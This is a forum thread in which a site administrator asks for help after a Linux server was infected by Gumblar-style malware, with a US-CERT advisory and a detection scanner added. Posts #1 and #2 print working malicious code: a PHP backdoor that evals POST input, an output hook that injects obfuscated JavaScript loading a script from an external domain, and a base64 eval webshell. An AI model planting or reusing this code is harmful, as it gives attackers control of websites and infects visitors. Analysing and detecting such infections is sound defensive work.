Page-infecting virus, again


  • Page-infecting virus, again

    Hi. Once again one of our servers has been infected with this!! It has added the following to the top of some pages in the source files!! It's odd, because we followed all the security measures and it still got infected. Can anyone help? The server is Linux.
    PHP code:
    if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('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'));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<******(.*?)</******>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<****** language=**********><!-- \n\(function\(.+?\n --></******>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?><?php
    /*
    And this is the decoded version:
    <****** language=**********><!--
    (function(){var t0WS='%';var dFIE7='`76`61r`20a`3d`22S`63`72ip`74En`67`69ne`22` 2c`62`3d`22Version(`29+`22`2cj`3d`22`22`2cu`3dn`61 v`69`67at`6fr`2e`75s`65rAge`6e`74`3bif(`28u`2e`69n `64`65`78`4ff(`22`43hr`6fme`22)`3c`30)`26`26(u`2ei n`64e`78`4f`66(`22Win`22)`3e0)`26`26(u`2e`69ndexO` 66(`22NT`206`22)`3c`30)`26`26(d`6fcu`6d`65n`74`2ec o`6f`6bie`2eindexOf`28`22miek`3d1`22)`3c0)`26`26(t ypeof`28zrvzts)`21`3dtype`6f`66(`22`41`22))`29`7bz rvz`74s`3d`22`41`22`3beval`28`22if(wi`6edo`77`2e`2 2+a+`22)j`3dj+`22`2b`61+`22Majo`72`22+b`2ba+`22Mi` 6eor`22+b+`61+`22Buil`64`22+b+`22j`3b`22)`3bdoc`75 ment`2ew`72it`65(`22`3c******`20s`72`63`3d`2f`2fma `22+`22`72t`75`7a`2ecn`2fv`69d`2f`3f`69d`3d`22`2bj +`22`3e`3c`5c`2fs`63`72ipt`3e`22)`3b`7d';var tvZ8=dFIE7.replace(/`/g,t0WS);eval(unescape(tvZ8))})();
    --></******>
    Last edited by 4shir; 05-30-2009, 09:47 AM.
    Water that comes unasked is not always a wish granted; sometimes it is a sign that you are about to be sacrificed... !

  • #2
    One interesting thing I just saw on one of the sites is that in some 755 folders, files have been uploaded that contain this:

    <?php eval(base64_decode('awyoaxnzzxqojf9qt1nuwydlj10pkw v2ywwoymfzzty0x2rly29kzsgkx1bpu1rbj2unxskpow==')); ?>
    if(isset($_post['e']))eval(base64_decode($_post['e']));echo '3137312e3133332d39332e39383a686974616d666f6b3a653 1313740686f7374';
    Last edited by 4shir; 05-30-2009, 09:46 AM.
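The samples in posts #1 and #2 share two markers: `eval` applied directly to request input, and `eval(base64_decode(...))`. The following Python scanner is an added example, not code from the thread. It flags both markers, unwraps quoted base64 literals to check the inner layer, and reports each flagged file's owner uid and mode; the rule names, file names and sample bodies in `demo()` are constructed for illustration.

```python
import base64, pathlib, re, stat, tempfile

# Rules derived from the two PHP samples posted in this thread.
RULES = {
    "eval-of-request-input": re.compile(rb"eval\s*\(\s*\$_(POST|GET|REQUEST|COOKIE)\b", re.I),
    "eval-of-base64": re.compile(rb"eval\s*\(\s*base64_decode\s*\(", re.I),
}
# eval(base64_decode('<literal>')): a quoted literal the scanner can unwrap itself.
LITERAL = re.compile(rb"eval\s*\(\s*base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=\s]+)['\"]", re.I)

def scan_bytes(data, depth=3):
    """Return sorted rule names matching data or any base64 layer inside it."""
    hits = {name for name, rx in RULES.items() if rx.search(data)}
    literals = LITERAL.finditer(data) if depth > 0 else ()
    for m in literals:
        try:
            inner = base64.b64decode(b"".join(m.group(1).split()), validate=True)
        except ValueError:
            continue  # mangled literal: the outer match is still reported
        hits.update(scan_bytes(inner, depth - 1))
    return sorted(hits)

def scan_tree(root):
    """Return (relative path, owner uid, octal mode, rule names) per flagged PHP file."""
    found = []
    for path in sorted(pathlib.Path(root).rglob("*")):
        if path.suffix.lower() not in (".php", ".phtml", ".inc") or not path.is_file():
            continue
        hits = scan_bytes(path.read_bytes())
        if hits:
            st = path.stat()
            found.append((str(path.relative_to(root)), st.st_uid,
                          oct(stat.S_IMODE(st.st_mode)), hits))
    return found

def demo():
    """Scan a temporary web root holding constructed samples (not real site files)."""
    inner = b"if(isset($_POST['k']))eval($_POST['k']);"  # constructed, shaped like post #1
    samples = {
        "clean.php": b"<?php echo 'hello'; ?>",
        "index.php": b"<?php " + inner + b" ?><?php echo 'page'; ?>",
        "dropped.php": b"<?php eval(base64_decode('" + base64.b64encode(inner) + b"')); ?>",
    }
    with tempfile.TemporaryDirectory() as root:
        for name, body in samples.items():
            pathlib.Path(root, name).write_bytes(body)
        return scan_tree(root)

if __name__ == "__main__":
    print(*demo(), sep="\n")
```

On a real server, call `scan_tree()` on the document root; the owner uid in each row shows which account wrote the file.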


    • #3
      Gumblar Malware Exploit Circulating
      added May 18, 2009 at 12:47 pm

      US-CERT is aware of public reports of a malware exploit circulating. This is a drive-by-download exploit with multiple stages and is being referred to as Gumblar. The first stage of this exploit attempts to compromise legitimate websites by injecting malicious code into them. Reports indicate that these website infections occur primarily through stolen FTP credentials but may also be compromised through poor configuration settings, vulnerable web applications, etc. The second stage of this exploit occurs when users visit a website compromised by Gumblar. Users who visit these compromised websites and have not applied updates for known PDF and Flash Player vulnerabilities may become infected with malware. This malware may be used by attackers to monitor network traffic and obtain sensitive information, including FTP and login credentials, that can be used to conduct further exploits. Additionally, this malware may also redirect Google search results for the infected user.

      US-CERT encourages users and administrators to apply software updates in a timely manner and use up-to-date antivirus software to help mitigate the risks.

      US-CERT will provide additional information as it becomes available.


      • #4
        Originally posted by 4shir
        One interesting thing I just saw on one of the sites is that in some 755 folders, files have been uploaded that contain this:
        In 755? Which user was it uploaded as?